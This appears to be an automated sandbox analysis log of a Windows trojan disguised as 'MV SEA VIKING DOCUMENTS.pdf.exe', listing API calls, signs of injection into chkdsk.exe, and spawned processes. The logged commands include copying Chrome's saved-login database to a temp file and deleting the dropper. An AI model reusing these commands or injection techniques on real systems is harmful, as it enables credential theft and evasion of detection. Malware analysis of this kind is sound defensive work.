      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 30_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,30_2_0040352D
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 34_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,34_2_0040352D
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 0549E692 appears 86 times
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 054AEF10 appears 105 times
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 05465050 appears 36 times
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 0541B910 appears 253 times
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 05477BE4 appears 95 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: String function: 1F1CB910 appears 253 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: String function: 1F227BE4 appears 95 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: String function: 1F24E692 appears 86 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: String function: 1F215050 appears 36 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: String function: 1F25EF10 appears 105 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: String function: 1F205050 appears 36 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: String function: 1F24EF10 appears 105 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: String function: 00402DA6 appears 51 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: String function: 1F217BE4 appears 95 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: String function: 1F1BB910 appears 253 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: String function: 1F23E692 appears 86 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_0245B2A6 NtAllocateVirtualMemory,0_2_0245B2A6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_02460B17 LoadLibraryA,NtProtectVirtualMemory,0_2_02460B17
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_0245FC11 NtWriteVirtualMemory,LoadLibraryA,0_2_0245FC11
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_024610EA NtResumeThread,0_2_024610EA
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_02452FC1 NtWriteVirtualMemory,0_2_02452FC1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_02458BDC NtWriteVirtualMemory,LoadLibraryA,0_2_02458BDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_0245F5CB NtWriteVirtualMemory,0_2_0245F5CB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212F00 NtCreateFile,LdrInitializeThunk,13_2_1F212F00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212E50 NtCreateSection,LdrInitializeThunk,13_2_1F212E50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212EB0 NtProtectVirtualMemory,LdrInitializeThunk,13_2_1F212EB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212ED0 NtResumeThread,LdrInitializeThunk,13_2_1F212ED0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212D10 NtQuerySystemInformation,LdrInitializeThunk,13_2_1F212D10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212DA0 NtReadVirtualMemory,LdrInitializeThunk,13_2_1F212DA0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_1F212DC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212C30 NtMapViewOfSection,LdrInitializeThunk,13_2_1F212C30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212C50 NtUnmapViewOfSection,LdrInitializeThunk,13_2_1F212C50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212CF0 NtDelayExecution,LdrInitializeThunk,13_2_1F212CF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212B10 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_1F212B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212B90 NtFreeVirtualMemory,LdrInitializeThunk,13_2_1F212B90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212BC0 NtQueryInformationToken,LdrInitializeThunk,13_2_1F212BC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F2129F0 NtReadFile,LdrInitializeThunk,13_2_1F2129F0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F2134E0 NtCreateMutant,LdrInitializeThunk,13_2_1F2134E0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212F30 NtOpenDirectoryObject,13_2_1F212F30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212FB0 NtSetValueKey,13_2_1F212FB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212E00 NtQueueApcThread,13_2_1F212E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212E80 NtCreateProcessEx,13_2_1F212E80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212EC0 NtQuerySection,13_2_1F212EC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212D50 NtWriteVirtualMemory,13_2_1F212D50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212C20 NtSetInformationFile,13_2_1F212C20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F213C30 NtOpenProcessToken,13_2_1F213C30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212C10 NtOpenProcess,13_2_1F212C10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F213C90 NtOpenThread,13_2_1F213C90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212CD0 NtEnumerateKey,13_2_1F212CD0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212B20 NtQueryInformationProcess,13_2_1F212B20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212B00 NtQueryValueKey,13_2_1F212B00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212B80 NtCreateKey,13_2_1F212B80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212BE0 NtQueryVirtualMemory,13_2_1F212BE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212A10 NtWriteFile,13_2_1F212A10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212AA0 NtQueryInformationFile,13_2_1F212AA0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212A80 NtClose,13_2_1F212A80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F212AC0 NtEnumerateValueKey,13_2_1F212AC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F2129D0 NtWaitForSingleObject,13_2_1F2129D0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F2138D0 NtGetContextThread,13_2_1F2138D0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F214570 NtSuspendThread,13_2_1F214570
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_1F214260 NtSetContextThread,13_2_1F214260
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_0167134E LdrInitializeThunk,NtProtectVirtualMemory,13_2_0167134E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_0167151A Sleep,NtProtectVirtualMemory,13_2_0167151A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_01671360 LdrInitializeThunk,NtProtectVirtualMemory,13_2_01671360
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_01671342 LdrInitializeThunk,NtProtectVirtualMemory,13_2_01671342
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_016713F4 NtProtectVirtualMemory,13_2_016713F4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_01671575 NtProtectVirtualMemory,13_2_01671575
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 13_2_01671598 NtProtectVirtualMemory,13_2_01671598
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_054634E0 NtCreateMutant,LdrInitializeThunk,21_2_054634E0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462D10 NtQuerySystemInformation,LdrInitializeThunk,21_2_05462D10
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,21_2_05462DC0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462C30 NtMapViewOfSection,LdrInitializeThunk,21_2_05462C30
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462CF0 NtDelayExecution,LdrInitializeThunk,21_2_05462CF0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462F00 NtCreateFile,LdrInitializeThunk,21_2_05462F00
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462FB0 NtSetValueKey,LdrInitializeThunk,21_2_05462FB0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462E50 NtCreateSection,LdrInitializeThunk,21_2_05462E50
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_054629F0 NtReadFile,LdrInitializeThunk,21_2_054629F0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462B00 NtQueryValueKey,LdrInitializeThunk,21_2_05462B00
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462B10 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_05462B10
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462BC0 NtQueryInformationToken,LdrInitializeThunk,21_2_05462BC0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462B80 NtCreateKey,LdrInitializeThunk,21_2_05462B80
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462B90 NtFreeVirtualMemory,LdrInitializeThunk,21_2_05462B90
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462AC0 NtEnumerateValueKey,LdrInitializeThunk,21_2_05462AC0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462A80 NtClose,LdrInitializeThunk,21_2_05462A80
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05464570 NtSuspendThread,21_2_05464570
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05464260 NtSetContextThread,21_2_05464260
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462D50 NtWriteVirtualMemory,21_2_05462D50
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462DA0 NtReadVirtualMemory,21_2_05462DA0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462C50 NtUnmapViewOfSection,21_2_05462C50
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462C10 NtOpenProcess,21_2_05462C10
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462C20 NtSetInformationFile,21_2_05462C20
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05463C30 NtOpenProcessToken,21_2_05463C30
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462CD0 NtEnumerateKey,21_2_05462CD0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05463C90 NtOpenThread,21_2_05463C90
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462F30 NtOpenDirectoryObject,21_2_05462F30
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462E00 NtQueueApcThread,21_2_05462E00
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462EC0 NtQuerySection,21_2_05462EC0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462ED0 NtResumeThread,21_2_05462ED0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462E80 NtCreateProcessEx,21_2_05462E80
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462EB0 NtProtectVirtualMemory,21_2_05462EB0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_054629D0 NtWaitForSingleObject,21_2_054629D0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_054638D0 NtGetContextThread,21_2_054638D0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462B20 NtQueryInformationProcess,21_2_05462B20
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462BE0 NtQueryVirtualMemory,21_2_05462BE0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462A10 NtWriteFile,21_2_05462A10
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_05462AA0 NtQueryInformationFile,21_2_05462AA0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_008885E0 NtCreateFile,21_2_008885E0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_00888690 NtReadFile,21_2_00888690
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_008887C0 NtAllocateVirtualMemory,21_2_008887C0
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_00888710 NtClose,21_2_00888710
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_0088868A NtReadFile,21_2_0088868A
      Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 21_2_0088870A NtClose,21_2_0088870A
      Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 33_2_00000244A227AD02 NtCreateFile,33_2_00000244A227AD02
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202D10 NtQuerySystemInformation,LdrInitializeThunk,35_2_1F202D10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,35_2_1F202DC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202B10 NtAllocateVirtualMemory,LdrInitializeThunk,35_2_1F202B10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202B90 NtFreeVirtualMemory,LdrInitializeThunk,35_2_1F202B90
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F2034E0 NtCreateMutant,LdrInitializeThunk,35_2_1F2034E0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202F30 NtOpenDirectoryObject,35_2_1F202F30
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202F00 NtCreateFile,35_2_1F202F00
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202FB0 NtSetValueKey,35_2_1F202FB0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202E00 NtQueueApcThread,35_2_1F202E00
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202E50 NtCreateSection,35_2_1F202E50
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202EB0 NtProtectVirtualMemory,35_2_1F202EB0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202E80 NtCreateProcessEx,35_2_1F202E80
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202EC0 NtQuerySection,35_2_1F202EC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202ED0 NtResumeThread,35_2_1F202ED0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202D50 NtWriteVirtualMemory,35_2_1F202D50
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202DA0 NtReadVirtualMemory,35_2_1F202DA0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202C20 NtSetInformationFile,35_2_1F202C20
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202C30 NtMapViewOfSection,35_2_1F202C30
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F203C30 NtOpenProcessToken,35_2_1F203C30
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202C10 NtOpenProcess,35_2_1F202C10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202C50 NtUnmapViewOfSection,35_2_1F202C50
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F203C90 NtOpenThread,35_2_1F203C90
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202CF0 NtDelayExecution,35_2_1F202CF0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202CD0 NtEnumerateKey,35_2_1F202CD0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202B20 NtQueryInformationProcess,35_2_1F202B20
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202B00 NtQueryValueKey,35_2_1F202B00
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202B80 NtCreateKey,35_2_1F202B80
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202BE0 NtQueryVirtualMemory,35_2_1F202BE0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202BC0 NtQueryInformationToken,35_2_1F202BC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202A10 NtWriteFile,35_2_1F202A10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202AA0 NtQueryInformationFile,35_2_1F202AA0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202A80 NtClose,35_2_1F202A80
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F202AC0 NtEnumerateValueKey,35_2_1F202AC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F2029F0 NtReadFile,35_2_1F2029F0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F2029D0 NtWaitForSingleObject,35_2_1F2029D0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F2038D0 NtGetContextThread,35_2_1F2038D0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F204570 NtSuspendThread,35_2_1F204570
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_1F204260 NtSetContextThread,35_2_1F204260
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_0166F2C1 NtProtectVirtualMemory,35_2_0166F2C1
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_0167053D LoadLibraryA,NtProtectVirtualMemory,35_2_0167053D
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Code function: 35_2_0166ACCC NtAllocateVirtualMemory,35_2_0166ACCC
      Source: usp10.dll.0.dr, Static PE information: No import functions for PE file found
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2797819742.000000001F470000.00000040.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766276229.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759455778.0000000001B04000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764124806.00000000000D6000.00000040.10000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, Static PE information: invalid certificate
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@20/9@62/23
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, File read: C:\Users\desktop.ini
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, ReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, File read: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown, Process created: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Process created: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: C:\Windows\SysWOW64\chkdsk.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exe, Process created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
      Source: C:\Windows\SysWOW64\chkdsk.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\chkdsk.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Windows\explorer.exe, Process created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Process created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
      Source: C:\Windows\explorer.exe, Process created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, File created: C:\Users\user\AppData\Local\Temp\nsaCA18.tmp
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_004021AA CoCreateInstance,0_2_004021AA
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8880:120:WilError_03
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8880:304:WilStaging_02
